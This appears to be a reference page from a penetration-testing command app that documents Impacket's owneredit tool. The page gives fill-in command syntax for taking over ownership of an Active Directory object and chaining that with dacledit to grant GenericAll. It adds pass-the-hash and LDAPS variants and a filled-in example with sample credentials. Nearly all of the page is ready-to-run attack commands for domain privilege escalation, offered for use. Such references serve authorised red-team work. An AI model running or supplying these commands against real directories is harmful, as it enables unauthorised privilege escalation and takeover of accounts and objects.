Impacket owneredit

Read or rewrite the nTSecurityDescriptor owner of an AD object. Use after a WriteOwner edge to seize an object, then chain with dacledit to grant yourself GenericAll. Default action is read; pass -action write to commit.

Tool
impacket-owneredit
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-owneredit '<domain>/<user>:<password>' -action write -target <target> -new-owner <attacker> -dc-ip <dc-ip>

Credential variants

The same attack using a different authentication material.

Read Current Owner requires password

impacket-owneredit '<domain>/<user>:<password>' -action read -target <target> -dc-ip <dc-ip>

Hash Auth requires NTLM hash

impacket-owneredit '<domain>/<user>' -hashes :<nt-hash> -action write -target <target> -new-owner <attacker> -dc-ip <dc-ip>

Use LDAPS requires password

impacket-owneredit '<domain>/<user>:<password>' -action write -target <target> -new-owner <attacker> -dc-ip <dc-ip> -use-ldaps

Examples

impacket-owneredit 'corp.local/jdoe:Password123!' -action write -target svc_app -new-owner jdoe -dc-ip 10.10.10.10

Tags

impacket owneredit acl-abuse writeowner